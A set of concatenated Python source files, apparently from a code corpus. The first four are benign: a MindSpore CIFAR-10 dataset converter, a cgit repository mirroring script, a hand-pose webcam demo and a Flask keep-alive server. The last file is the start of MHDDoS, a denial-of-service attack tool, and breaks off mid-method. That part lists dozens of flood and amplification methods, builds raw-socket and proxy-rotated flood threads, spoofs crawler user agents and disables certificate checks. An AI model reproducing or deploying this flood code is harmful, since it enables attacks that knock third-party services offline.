|
cifar10_to_mr.py | # Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Cifar10 convert tool for MindRecord.
"""
from importlib import import_module
import os
import numpy as np
from mindspore import log as logger
from .cifar10 import Cifar10
from ..common.exceptions import PathNotExistsError
from ..filewriter import FileWriter
from ..shardutils import check_filename, ExceptionThread, SUCCESS, FAILED
try:
cv2 = import_module("cv2")
except ModuleNotFoundError:
cv2 = None
__all__ = ['Cifar10ToMR']
class Cifar10ToMR:
"""
A class to transform from cifar10 to MindRecord.
Args:
source (str): the cifar10 directory to be transformed.
destination (str): the MindRecord file path to transform into.
Raises:
ValueError: If source or destination is invalid.
"""
def __init__(self, source, destination):
check_filename(source)
self.source = source
files = os.listdir(self.source)
train_data_flag = False
test_data_flag = False
for file in files:
if file.startswith("data_batch_"):
train_data_flag = True
if file.startswith("test_batch"):
test_data_flag = True
if not train_data_flag:
raise PathNotExistsError("data_batch_*")
if not test_data_flag:
raise PathNotExistsError("test_batch")
check_filename(destination)
self.destination = destination
self.writer = None
def run(self, fields=None):
"""
Executes transformation from cifar10 to MindRecord.
Args:
fields (list[str], optional): A list of index fields, e.g.["label"] (default=None).
Returns:
MSRStatus, whether cifar10 is successfully transformed to MindRecord.
"""
if fields and not isinstance(fields, list):
raise ValueError("The parameter fields should be None or list")
cifar10_data = Cifar10(self.source, False)
cifar10_data.load_data()
images = cifar10_data.images
logger.info("train images: {}".format(images.shape))
labels = cifar10_data.labels
logger.info("train images label: {}".format(labels.shape))
test_images = cifar10_data.Test.images
logger.info("test images: {}".format(test_images.shape))
test_labels = cifar10_data.Test.labels
logger.info("test images label: {}".format(test_labels.shape))
data_list = _construct_raw_data(images, labels)
test_data_list = _construct_raw_data(test_images, test_labels)
if _generate_mindrecord(self.destination, data_list, fields, "img_train") != SUCCESS:
return FAILED
if _generate_mindrecord(self.destination + "_test", test_data_list, fields, "img_test") != SUCCESS:
return FAILED
return SUCCESS
def transform(self, fields=None):
t = ExceptionThread(target=self.run, kwargs={'fields': fields})
t.daemon = True
t.start()
t.join()
if t.exitcode != 0:
raise t.exception
return t.res
def _construct_raw_data(images, labels):
"""
Construct raw data from cifar10 data.
Args:
images (list): image list from cifar10.
labels (list): label list from cifar10.
Returns:
list[dict], data dictionary constructed from cifar10.
"""
if not cv2:
raise ModuleNotFoundError("opencv-python module not found, please use pip install it.")
raw_data = []
for i, img in enumerate(images):
label = np.int(labels[i][0])
_, img = cv2.imencode(".jpeg", img[..., [2, 1, 0]])
row_data = {"id": int(i),
"data": img.tobytes(),
"label": int(label)}
raw_data.append(row_data)
return raw_data
def _generate_mindrecord(file_name, raw_data, fields, schema_desc):
"""
Generate MindRecord file from raw data.
Args:
file_name (str): File name of MindRecord File.
fields (list[str]): Fields would be set as index which
could not belong to blob fields and type could not be 'array' or 'bytes'.
raw_data (dict): dict of raw data.
schema_desc (str): String of schema description.
Returns:
MSRStatus, whether successfully written into MindRecord.
"""
schema = {"id": {"type": "int64"}, "label": {"type": "int64"},
"data": {"type": "bytes"}}
logger.info("transformed MindRecord schema is: {}".format(schema))
writer = FileWriter(file_name, 1)
writer.add_schema(schema, schema_desc)
if fields and isinstance(fields, list):
writer.add_index(fields)
writer.write_raw_data(raw_data)
return writer.commit()
|
cgitsync.py | #!/usr/bin/env python3
"""Cgit mirror and sync utility.
This is a simple utility that allows easy cloning and updating of a
git repository that is defined in a cgitrepos configuration file.
Multiple cgit sections can be specified that point at specific
provider.
When a repo is added to a section this utility will clone the repo to
the repo.path. On subsequent runs this will just update the repo at
repo.path.
PROVIDERS
---------
github The repo.url must be formatted '{username|org}/repo'.
Clones via ssh protocol (e.g., git@github.com:org/repo.git).
custom Clone from a custom provider. Note that this provider is
specified by passing the '--template' option. Any of the
repo keys can be be specified in the template, e.g.:
'ssh://mygit.com/{mykey}/{owner}/{url}.git'.
See also: https://git.zx2c4.com/cgit/tree/cgitrc.5.txt
"""
__author__ = "Anthony O'Brien"
__copyright__ = "Copyright 2017, Anthony O'Brien"
__license__ = "MIT"
__version__ = "0.1.0-rc.1"
__maintainer__ = "Anthony O'Brien"
__email__ = "anthony@bearonis.com"
import os
import sys
import logging
import argparse
import threading
import subprocess
GIT_TIMEOUT = 900
GIT_BIN = None
TARGET_TEMPLATE = None
log = logging.getLogger('cgitsync')
# ----------------------------------------------------
# Helpers
# ----------------------------------------------------
def which(program):
"""Returns full path to `program` if found in $PATH or else None
if the executable is not found.
SRC: http://stackoverflow.com/a/377028/983310
"""
import os
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
def process(cmd, env=None):
"""Run the cmd as a subprocess, optionally specifying an environment.
By default the cnd runs with the inherited environment. The return
code from the process is returned.
"""
def pipe_writer(log_level, pipe):
"""Readlines from a specified `pipe` and write to the
specified file descriptor `fd`."""
while retcode is None:
for line in iter(pipe.readline, b''):
log.log(log_level, line.decode())
pipe.close()
retcode = None
p = subprocess.Popen(cmd,
env=env,
bufsize=0,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
t_out = threading.Thread(target=pipe_writer, args=(logging.INFO, p.stdout))
t_err = threading.Thread(target=pipe_writer, args=(logging.ERROR, p.stderr))
t_out.daemon = True
t_err.daemon = True
t_out.start()
t_err.start()
retcode = p.wait(timeout=GIT_TIMEOUT)
t_out.join()
t_err.join()
return retcode
def setup_logger(verbosity=0, log_file=None):
global log
log_fmt = logging.Formatter('%(message)s')
loglevel = 30 - (verbosity * 15) # WARN+, INFO, DEBUG, DEBUG + libs
loglevel = loglevel if loglevel > 0 else 10 # let's be reasonable
if verbosity > 2:
log = logging.getLogger() # all the logs!
log.setLevel(loglevel)
if log_file:
handler = logging.FileHandler(os.path.abspath(
os.path.expandvars(
os.path.expanduser(log_file))))
else:
handler = logging.StreamHandler(stream=sys.stderr)
handler.setLevel(loglevel)
handler.setFormatter(log_fmt)
log.addHandler(handler)
return
def git(args):
"""Run a git command."""
cmd = GIT_BIN + ' ' + args
out = process(cmd)
return out
# ----------------------------------------------------
# cgitsync
# ----------------------------------------------------
def get_section(cfg, section):
"""Parse a cgitrepos cfg returning specified section."""
section_lines = []
is_append_section = False
for line in cfg.splitlines():
line = line.strip()
if line.startswith('section') and not is_append_section:
cfg_section = line.split('=', 1)[1].strip()
if cfg_section == section:
is_append_section = True
elif line.startswith('section') and is_append_section:
break # skip any subsequent sections
if is_append_section:
section_lines.append(line)
return section_lines
def get_repos(section):
"""TK"""
repos = {}
repo = {}
for line in section:
line = line.strip()
if line.startswith('repo.url'):
if repo.get('url'):
repos[repo['url']] = repo
url = line.split('=', 1)[1].strip()
repo = {'url' : url}
elif line.startswith('repo.'):
repodata = line.split('.', 1)[1]
key, val = [item.strip() for item in repodata.strip().split('=', 1)]
repo[key] = val
if repo.get('url'):
repos[repo['url']] = repo
return repos
def set_source_target(template=None, provider='github'):
global TARGET_TEMPLATE
if template:
TARGET_TEMPLATE = template
elif provider == 'github':
TARGET_TEMPLATE = 'git@github.com:{url}.git'
else:
log.error('No provider or custom format provided.')
sys.exit(-1)
return
def get_source_target(repo):
return TARGET_TEMPLATE.format(**repo)
def mirror_or_update(repo):
source_repo = get_source_target(repo)
if not os.path.exists(repo['path']):
log.info('Cloning: {} ...'.format(repo['url']))
log.debug('Source target: {}'.format(source_repo))
retcode = git('clone --mirror {} {}'.format(source_repo, repo['path']))
else:
log.info('Updating: {} ...'.format(repo['url']))
retcode = git('-C {} remote update'.format(repo['path']))
if retcode:
log.error('Git exited with code: %i\n' % retcode)
return retcode
def parse_args():
parser = argparse.ArgumentParser(prog='cgitsync',
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('section', metavar='SECTION', nargs='+',
help='Section in cgitrepos to sync, multiple sections may be specified')
parser.add_argument('-v', action='count', default=0,
help='Verbosity, can be repeated (default: WARNING)')
parser.add_argument('-c', '--config', metavar='CONFIG', default='/etc/cgitrepos',
help='Path to cgitrepos configuration (default: /etc/cgitrepos)')
parser.add_argument('-g', '--git', metavar='GIT',
help='Path to git (default: {})'.format(
(GIT_BIN if GIT_BIN else 'git on $PATH')))
parser.add_argument('-l', '--log-file', metavar='LOGFILE',
help='Path to logfile (default: stderr)')
providers = parser.add_mutually_exclusive_group()
providers.add_argument('-p', '--provider', metavar='PROVIDER', default='github',
choices=['github'],
help='Sync from selected provider (default: github)')
providers.add_argument('-t', '--template', metavar='TEMPLATE',
help='Custom provider format string (e.g., '
'https://mygit.com/{url}/{owner}). Any of the '
'repo keys in cgitrepos is valid.')
parser.add_argument('--version', action='version',
version=('%(prog)s ' + __version__),
help='Print version information')
args = parser.parse_args()
if GIT_BIN is None:
log.error('No git binary found on $PATH')
sys.exit(-1)
return args
def main():
global GIT_BIN
GIT_BIN = which('git')
error_count = 0
args = parse_args()
setup_logger(verbosity=args.v, log_file=args.log_file)
set_source_target(template=args.template, provider=args.provider)
with open(args.config, 'r') as f:
cfg = f.read()
for section_name in args.section:
section = get_section(cfg, section_name)
if not section:
log.warning('section={} not found in {}'.format(section_name, args.config))
continue
log.info('Processing repos in section={}'.format(section_name))
for repo in get_repos(section).values():
try:
retcode = mirror_or_update(repo)
error_count += (1 if retcode else 0)
except Exception as e:
error_count += 1
log.error('Error cloning/updating: {}'.format(repo['url']))
log.exception(e)
sys.exit(error_count)
if __name__ == '__main__':
main()
|
handpose_local_app.py | #-*-coding:utf-8-*-
'''
DpCas-Light
|||| ||||| |||| || |||||||
|| || || || || || |||| || ||
|| || || || || || || || ||
|| || || || || ||====|| ||||||
|| || ||||| || || ||======|| ||
|| || || || || || || || ||
|||| || |||| || || |||||||
/--------------------- HandPose_X ---------------------/
'''
# date:2021-03-12
# Author: Eric.Lee
# function: handpose demo
import os
import cv2
import time
from multiprocessing import Process
from multiprocessing import Manager
import cv2
import numpy as np
import random
import time
# 加载模型组件库
from hand_detect.yolo_v3_hand import yolo_v3_hand_model
from hand_keypoints.handpose_x import handpose_x_model
from classify_imagenet.imagenet_c import classify_imagenet_model
# 加载工具库
import sys
sys.path.append("./lib/hand_lib/")
from cores.handpose_fuction import handpose_track_keypoints21_pipeline
from cores.handpose_fuction import hand_tracking,audio_recognize,judge_click_stabel,draw_click_lines
from utils.utils import parse_data_cfg
# from playsound import playsound
'''
def audio_process_dw_edge_cnt(info_dict):
while (info_dict["handpose_procss_ready"] == False): # 等待 模型加载
time.sleep(2)
gesture_names = ["click"]
gesture_dict = {}
for k_ in gesture_names:
gesture_dict[k_] = None
# time.sleep(1)
# playsound("./materials/audio/sentences/WelcomeAR.mp3")
# time.sleep(0.01)
# playsound("./materials/audio/sentences/MorningEric.mp3")
# time.sleep(1)
reg_cnt = 0
while True:
time.sleep(0.01)
try:
reg_cnt = info_dict["click_dw_cnt"]
for i in range(reg_cnt):
# playsound("./materials/audio/cue/winwin-1.mp3")
playsound("./materials/audio/sentences/welldone.mp3")
info_dict["click_dw_cnt"] = info_dict["click_dw_cnt"] - reg_cnt
except Exception as inst:
print(type(inst),inst) # exception instance
if info_dict["break"] == True:
break
def audio_process_up_edge_cnt(info_dict):
while (info_dict["handpose_procss_ready"] == False): # 等待 模型加载
time.sleep(2)
gesture_names = ["click"]
gesture_dict = {}
for k_ in gesture_names:
gesture_dict[k_] = None
reg_cnt = 0
while True:
time.sleep(0.01)
# print(" --->>> audio_process")
try:
reg_cnt = info_dict["click_up_cnt"]
for i in range(reg_cnt):
# playsound("./materials/audio/cue/m2-0.mp3")
playsound("./materials/audio/sentences/Click.mp3")
info_dict["click_up_cnt"] = info_dict["click_up_cnt"] - reg_cnt
except Exception as inst:
print(type(inst),inst) # the exception instance
if info_dict["break"] == True:
break
def audio_process_dw_edge(info_dict):
while (info_dict["handpose_procss_ready"] == False): # 等待 模型加载
time.sleep(2)
gesture_names = ["click"]
gesture_dict = {}
for k_ in gesture_names:
gesture_dict[k_] = None
while True:
time.sleep(0.01)
# print(" --->>> audio_process")
try:
for g_ in gesture_names:
if gesture_dict[g_] is None:
gesture_dict[g_] = info_dict[g_]
else:
if ("click"==g_):
if (info_dict[g_]^gesture_dict[g_]) and info_dict[g_]==False:# 判断Click手势信号为下降沿,Click动作结束
playsound("./materials/audio/cue/winwin.mp3")
# playsound("./materials/audio/sentences/welldone.mp3")
gesture_dict[g_] = info_dict[g_]
except Exception as inst:
print(type(inst),inst) # the exception instance
if info_dict["break"] == True:
break
def audio_process_up_edge(info_dict):
while (info_dict["handpose_procss_ready"] == False): # 等待 模型加载
time.sleep(2)
gesture_names = ["click"]
gesture_dict = {}
for k_ in gesture_names:
gesture_dict[k_] = None
while True:
time.sleep(0.01)
# print(" --->>> audio_process")
try:
for g_ in gesture_names:
if gesture_dict[g_] is None:
gesture_dict[g_] = info_dict[g_]
else:
if ("click"==g_):
if (info_dict[g_]^gesture_dict[g_]) and info_dict[g_]==True:# 判断Click手势信号为上升沿,Click动作开始
playsound("./materials/audio/cue/m2.mp3")
# playsound("./materials/audio/sentences/clik_quick.mp3")
gesture_dict[g_] = info_dict[g_]
except Exception as inst:
print(type(inst),inst) # the exception instance
if info_dict["break"] == True:
break
'''
# 启动识别语音进程
'''
def audio_process_recognize_up_edge(info_dict):
while (info_dict["handpose_procss_ready"] == False): # 等待 模型加载
time.sleep(2)
gesture_names = ["double_en_pts"]
gesture_dict = {}
for k_ in gesture_names:
gesture_dict[k_] = None
while True:
time.sleep(0.01)
# print(" --->>> audio_process")
try:
for g_ in gesture_names:
if gesture_dict[g_] is None:
gesture_dict[g_] = info_dict[g_]
else:
if ("double_en_pts"==g_):
if (info_dict[g_]^gesture_dict[g_]) and info_dict[g_]==True:# 判断Click手势信号为上升沿,Click动作开始
playsound("./materials/audio/sentences/IdentifyingObjectsWait.mp3")
playsound("./materials/audio/sentences/ObjectMayBeIdentified.mp3")
if info_dict["reco_msg"] is not None:
print("process - (audio_process_recognize_up_edge) reco_msg : {} ".format(info_dict["reco_msg"]))
doc_name = info_dict["reco_msg"]["label_msg"]["doc_name"]
reco_audio_file = "./materials/audio/imagenet_2012/{}.mp3".format(doc_name)
if os.access(reco_audio_file,os.F_OK):# 判断语音文件是否存在
playsound(reco_audio_file)
info_dict["reco_msg"] = None
gesture_dict[g_] = info_dict[g_]
except Exception as inst:
print(type(inst),inst) # exception instance
if info_dict["break"] == True:
break
'''
'''
/*****************************************/
算法 pipeline
/*****************************************/
'''
def handpose_x_process(info_dict,config):
# 模型初始化
print("load model component ...")
# yolo v3 手部检测模型初始化
hand_detect_model = yolo_v3_hand_model(conf_thres=float(config["detect_conf_thres"]),nms_thres=float(config["detect_nms_thres"]),
model_arch = config["detect_model_arch"],model_path = config["detect_model_path"],yolo_anchor_scale = float(config["yolo_anchor_scale"]),
img_size = float(config["detect_input_size"]),
)
# handpose_x 21 关键点回归模型初始化
handpose_model = handpose_x_model(model_arch = config["handpose_x_model_arch"],model_path = config["handpose_x_model_path"])
#
gesture_model = None # 目前缺省
#
object_recognize_model = classify_imagenet_model(model_arch = config["classify_model_arch"],model_path = config["classify_model_path"],
num_classes = int(config["classify_model_classify_num"])) # 识别分类模型
#
img_reco_crop = None
cap = cv2.VideoCapture(int(config["camera_id"])) # 开启摄像机
cap.set(cv2.CAP_PROP_EXPOSURE, -8) # 设置相机曝光,(注意:不是所有相机有效)
# url="http://admin:admin@192.168.43.1:8081"
# cap=cv2.VideoCapture(url)
print("start handpose process ~")
info_dict["handpose_procss_ready"] = True #多进程间的开始同步信号
gesture_lines_dict = {} # 点击使能时的轨迹点
hands_dict = {} # 手的信息
hands_click_dict = {} #手的按键信息计数
track_index = 0 # 跟踪的全局索引
while True:
ret, img = cap.read()# 读取相机图像
if ret:# 读取相机图像成功
# img = cv2.flip(img,-1)
algo_img = img.copy()
st_ = time.time()
#------
hand_bbox =hand_detect_model.predict(img,vis = True) # 检测手,获取手的边界框
hands_dict,track_index = hand_tracking(data = hand_bbox,hands_dict = hands_dict,track_index = track_index) # 手跟踪,目前通过IOU方式进行目标跟踪
# 检测每个手的关键点及相关信息
handpose_list = handpose_track_keypoints21_pipeline(img,hands_dict = hands_dict,hands_click_dict = hands_click_dict,track_index = track_index,algo_img = algo_img,
handpose_model = handpose_model,gesture_model = gesture_model,
icon = None,vis = True)
et_ = time.time()
fps_ = 1./(et_-st_+1e-8)
#------------------------------------------ 跟踪手的 信息维护
#------------------ 获取跟踪到的手ID
id_list = []
for i in range(len(handpose_list)):
_,_,_,dict_ = handpose_list[i]
id_list.append(dict_["id"])
# print(id_list)
#----------------- 获取需要删除的手ID
id_del_list = []
for k_ in gesture_lines_dict.keys():
if k_ not in id_list:#去除过往已经跟踪失败的目标手的相关轨迹
id_del_list.append(k_)
#----------------- 删除无法跟踪到的手的相关信息
for k_ in id_del_list:
del gesture_lines_dict[k_]
del hands_click_dict[k_]
#----------------- 更新检测到手的轨迹信息,及手点击使能时的上升沿和下降沿信号
double_en_pts = []
for i in range(len(handpose_list)):
_,_,_,dict_ = handpose_list[i]
id_ = dict_["id"]
if dict_["click"]:
if id_ not in gesture_lines_dict.keys():
gesture_lines_dict[id_] = {}
gesture_lines_dict[id_]["pts"]=[]
gesture_lines_dict[id_]["line_color"] = (random.randint(100,255),random.randint(100,255),random.randint(100,255))
gesture_lines_dict[id_]["click"] = None
#判断是否上升沿
if gesture_lines_dict[id_]["click"] is not None:
if gesture_lines_dict[id_]["click"] == False:#上升沿计数器
info_dict["click_up_cnt"] += 1
#获得点击状态
gesture_lines_dict[id_]["click"] = True
#---获得坐标
gesture_lines_dict[id_]["pts"].append(dict_["choose_pt"])
double_en_pts.append(dict_["choose_pt"])
else:
if id_ not in gesture_lines_dict.keys():
gesture_lines_dict[id_] = {}
gesture_lines_dict[id_]["pts"]=[]
gesture_lines_dict[id_]["line_color"] = (random.randint(100,255),random.randint(100,255),random.randint(100,255))
gesture_lines_dict[id_]["click"] = None
elif id_ in gesture_lines_dict.keys():
gesture_lines_dict[id_]["pts"]=[]# 清除轨迹
#判断是否上升沿
if gesture_lines_dict[id_]["click"] == True:#下降沿计数器
info_dict["click_dw_cnt"] += 1
# 更新点击状态
gesture_lines_dict[id_]["click"] = False
#绘制手click 状态时的大拇指和食指中心坐标点轨迹
draw_click_lines(img,gesture_lines_dict,vis = bool(config["vis_gesture_lines"]))
# 判断各手的click状态是否稳定,且满足设定阈值
flag_click_stable = judge_click_stabel(img,handpose_list,int(config["charge_cycle_step"]))
# 判断是否启动识别语音,且进行选中目标识别
img_reco_crop,reco_msg = audio_recognize(img,algo_img,img_reco_crop,object_recognize_model,info_dict,double_en_pts,flag_click_stable)
# print(reco_msg)
cv2.putText(img, 'HandNum:[{}]'.format(len(hand_bbox)), (5,25),cv2.FONT_HERSHEY_COMPLEX, 0.7, (255, 0, 0),5)
cv2.putText(img, 'HandNum:[{}]'.format(len(hand_bbox)), (5,25),cv2.FONT_HERSHEY_COMPLEX, 0.7, (0, 0, 255))
cv2.namedWindow("image",0)
cv2.imshow("image",img)
if cv2.waitKey(1) == 27:
info_dict["break"] = True
break
else:
break
cap.release()
cv2.destroyAllWindows()
def main_handpose_x(cfg_file):
config = parse_data_cfg(cfg_file)
print("\n/---------------------- main_handpose_x config ------------------------/\n")
for k_ in config.keys():
print("{} : {}".format(k_,config[k_]))
print("\n/------------------------------------------------------------------------/\n")
print(" loading handpose_x local demo ...")
g_info_dict = Manager().dict()# 多进程共享字典初始化:用于多进程间的 key:value 操作
g_info_dict["handpose_procss_ready"] = False # 进程间的开启同步信号
g_info_dict["break"] = False # 进程间的退出同步信号
g_info_dict["double_en_pts"] = False # 双手选中动作使能信号
g_info_dict["click_up_cnt"] = 0
g_info_dict["click_dw_cnt"] = 0
g_info_dict["reco_msg"] = None
print(" multiprocessing dict key:\n")
for key_ in g_info_dict.keys():
print( " -> ",key_)
print()
#-------------------------------------------------- 初始化各进程
process_list = []
t = Process(target=handpose_x_process,args=(g_info_dict,config,))
process_list.append(t)
# t = Process(target=audio_process_recognize_up_edge,args=(g_info_dict,)) # 上升沿播放
# process_list.append(t)
# t = Process(target=audio_process_dw_edge_cnt,args=(g_info_dict,)) # 下降沿播放
# process_list.append(t)
# t = Process(target=audio_process_up_edge_cnt,args=(g_info_dict,)) # 上升沿播放
# process_list.append(t)
for i in range(len(process_list)):
process_list[i].start()
for i in range(len(process_list)):
process_list[i].join()# 设置主线程等待子线程结束
del process_list
|
keepalive.py | from flask import Flask
from threading import Thread
from gevent.pywsgi import WSGIServer
import os
app = Flask(__name__)
@app.route('/', methods=['GET'])
def home():
return "I'm alive"
def run():
"""
Serves the purpose of keeping the repl instance alive trough a webhook. Setting the webhook pinger part is up to the host
"""
http_server = WSGIServer(('', os.getenv('WEBHOOK_PORT', 8080)), app)
http_server.serve_forever()
def keep_alive():
t = Thread(target=run, daemon=True)
t.start()
return t
|
start.py | #!/usr/bin/env python3
from concurrent.futures import ThreadPoolExecutor, as_completed
from contextlib import suppress
from itertools import cycle
from json import load
from logging import basicConfig, getLogger, shutdown
from math import log2, trunc
from multiprocessing import RawValue
from os import urandom as randbytes
from pathlib import Path
from secrets import choice as randchoice
from socket import (AF_INET, IP_HDRINCL, IPPROTO_IP, IPPROTO_TCP, IPPROTO_UDP, SOCK_DGRAM,
SOCK_RAW, SOCK_STREAM, TCP_NODELAY, gethostbyname,
gethostname, socket)
from ssl import CERT_NONE, SSLContext, create_default_context
from struct import pack as data_pack
from subprocess import run, PIPE
from sys import argv
from sys import exit as _exit
from threading import Event, Thread
from time import sleep, time
from typing import Any, List, Set, Tuple
from urllib import parse
from uuid import UUID, uuid4
from PyRoxy import Proxy, ProxyChecker, ProxyType, ProxyUtiles
from PyRoxy import Tools as ProxyTools
from certifi import where
from cfscrape import create_scraper
from dns import resolver
from icmplib import ping
from impacket.ImpactPacket import IP, TCP, UDP, Data
from psutil import cpu_percent, net_io_counters, process_iter, virtual_memory
from requests import Response, Session, exceptions, get, cookies
from yarl import URL
basicConfig(format='[%(asctime)s - %(levelname)s] %(message)s',
datefmt="%H:%M:%S")
logger = getLogger("MHDDoS")
logger.setLevel("DEBUG")
ctx: SSLContext = create_default_context(cafile=where())
ctx.check_hostname = False
ctx.verify_mode = CERT_NONE
__version__: str = "2.4 SNAPSHOT"
__dir__: Path = Path(__file__).parent
__ip__: Any = None
def getMyIPAddress():
global __ip__
if __ip__:
return __ip__
with suppress(Exception):
__ip__ = get('https://api.my-ip.io/ip', timeout=.1).text
with suppress(Exception):
__ip__ = get('https://ipwhois.app/json/', timeout=.1).json()["ip"]
with suppress(Exception):
__ip__ = get('https://ipinfo.io/json', timeout=.1).json()["ip"]
with suppress(Exception):
__ip__ = ProxyTools.Patterns.IP.search(get('http://checkip.dyndns.org/', timeout=.1).text)
with suppress(Exception):
__ip__ = ProxyTools.Patterns.IP.search(get('https://spaceiran.com/myip/', timeout=.1).text)
with suppress(Exception):
__ip__ = get('https://ip.42.pl/raw', timeout=.1).text
return getMyIPAddress()
def exit(*message):
if message:
logger.error(" ".join(message))
shutdown()
_exit(1)
class Methods:
LAYER7_METHODS: Set[str] = {
"CFB", "BYPASS", "GET", "POST", "OVH", "STRESS", "DYN", "SLOW", "HEAD",
"NULL", "COOKIE", "PPS", "EVEN", "GSB", "DGB", "AVB", "CFBUAM",
"APACHE", "XMLRPC", "BOT", "BOMB", "DOWNLOADER"
}
LAYER4_METHODS: Set[str] = {
"TCP", "UDP", "SYN", "VSE", "MINECRAFT", "MEM", "NTP", "DNS", "ARD",
"CHAR", "RDP", "MCBOT", "CONNECTION", "CPS", "FIVEM", "TS3", "MCPE",
"CLDAP"
}
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
google_agents = [
"Mozila/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, "
"like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; "
"+http://www.google.com/bot.html)) "
"Googlebot/2.1 (+http://www.google.com/bot.html)",
"Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
]
class Counter:
def __init__(self, value=0):
self._value = RawValue('i', value)
def __iadd__(self, value):
self._value.value += value
return self
def __int__(self):
return self._value.value
def set(self, value):
self._value.value = value
return self
REQUESTS_SENT = Counter()
BYTES_SEND = Counter()
class Tools:
@staticmethod
def humanbytes(i: int, binary: bool = False, precision: int = 2):
MULTIPLES = [
"B", "k{}B", "M{}B", "G{}B", "T{}B", "P{}B", "E{}B", "Z{}B", "Y{}B"
]
if i > 0:
base = 1024 if binary else 1000
multiple = trunc(log2(i) / log2(base))
value = i / pow(base, multiple)
suffix = MULTIPLES[multiple].format("i" if binary else "")
return f"{value:.{precision}f} {suffix}"
else:
return f"-- B"
@staticmethod
def humanformat(num: int, precision: int = 2):
suffixes = ['', 'k', 'm', 'g', 't', 'p']
if num > 999:
obje = sum(
[abs(num / 1000.0 ** x) >= 1 for x in range(1, len(suffixes))])
return f'{num / 1000.0 ** obje:.{precision}f}{suffixes[obje]}'
else:
return num
@staticmethod
def sizeOfRequest(res: Response) -> int:
size: int = len(res.request.method)
size += len(res.request.url)
size += len('\r\n'.join(f'{key}: {value}'
for key, value in res.request.headers.items()))
return size
@staticmethod
def randchr(lengh: int) -> str:
return str(ProxyTools.Tools.rand_char(lengh)).strip()
@staticmethod
def send(sock: socket, packet: bytes):
global BYTES_SEND, REQUESTS_SENT
if not sock.send(packet):
return False
BYTES_SEND += len(packet)
REQUESTS_SENT += 1
return True
@staticmethod
def sendto(sock, packet, target):
global BYTES_SEND, REQUESTS_SENT
if not sock.sendto(packet, target):
return False
BYTES_SEND += len(packet)
REQUESTS_SENT += 1
return True
@staticmethod
def safe_close(sock=None):
if sock:
sock.close()
class Minecraft:
@staticmethod
def varint(d: int) -> bytes:
o = b''
while True:
b = d & 0x7F
d >>= 7
o += data_pack("B", b | (0x80 if d > 0 else 0))
if d == 0:
break
return o
@staticmethod
def data(*payload: bytes) -> bytes:
payload = b''.join(payload)
return Minecraft.varint(len(payload)) + payload
@staticmethod
def short(integer: int) -> bytes:
return data_pack('>H', integer)
@staticmethod
def handshake(target: Tuple[str, int], version: int, state: int) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(version),
Minecraft.data(target[0].encode()),
Minecraft.short(target[1]),
Minecraft.varint(state))
@staticmethod
def handshake_forwarded(target: Tuple[str, int], version: int, state: int, ip: str, uuid: UUID) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(version),
Minecraft.data(
target[0].encode(),
b"\x00",
ip.encode(),
b"\x00",
uuid.hex.encode()
),
Minecraft.short(target[1]),
Minecraft.varint(state))
@staticmethod
def login(username: str) -> bytes:
if isinstance(username, str):
username = username.encode()
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.data(username))
@staticmethod
def keepalive(num_id: int) -> bytes:
return Minecraft.data(Minecraft.varint(0x00),
Minecraft.varint(num_id))
@staticmethod
def chat(message: str) -> bytes:
return Minecraft.data(Minecraft.varint(0x01),
Minecraft.data(message.encode()))
# noinspection PyBroadException,PyUnusedLocal
class Layer4(Thread):
_method: str
_target: Tuple[str, int]
_ref: Any
SENT_FLOOD: Any
_amp_payloads = cycle
_proxies: List[Proxy] = None
def __init__(self,
target: Tuple[str, int],
ref: List[str] = None,
method: str = "TCP",
synevent: Event = None,
proxies: Set[Proxy] = None):
Thread.__init__(self, daemon=True)
self._amp_payload = None
self._amp_payloads = cycle([])
self._ref = ref
self._method = method
self._target = target
self._synevent = synevent
if proxies:
self._proxies = list(proxies)
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
self.SENT_FLOOD()
def open_connection(self,
conn_type=AF_INET,
sock_type=SOCK_STREAM,
proto_type=IPPROTO_TCP):
if self._proxies:
s = randchoice(self._proxies).open_socket(
conn_type, sock_type, proto_type)
else:
s = socket(conn_type, sock_type, proto_type)
s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
s.settimeout(60)
s.connect(self._target)
return s
def select(self, name):
self.SENT_FLOOD = self.TCP
if name == "UDP": self.SENT_FLOOD = self.UDP
if name == "SYN": self.SENT_FLOOD = self.SYN
if name == "VSE": self.SENT_FLOOD = self.VSE
if name == "TS3": self.SENT_FLOOD = self.TS3
if name == "MCPE": self.SENT_FLOOD = self.MCPE
if name == "FIVEM": self.SENT_FLOOD = self.FIVEM
if name == "MINECRAFT": self.SENT_FLOOD = self.MINECRAFT
if name == "CPS": self.SENT_FLOOD = self.CPS
if name == "CONNECTION": self.SENT_FLOOD = self.CONNECTION
if name == "MCBOT": self.SENT_FLOOD = self.MCBOT
if name == "RDP":
self._amp_payload = (
b'\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00',
3389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CLDAP":
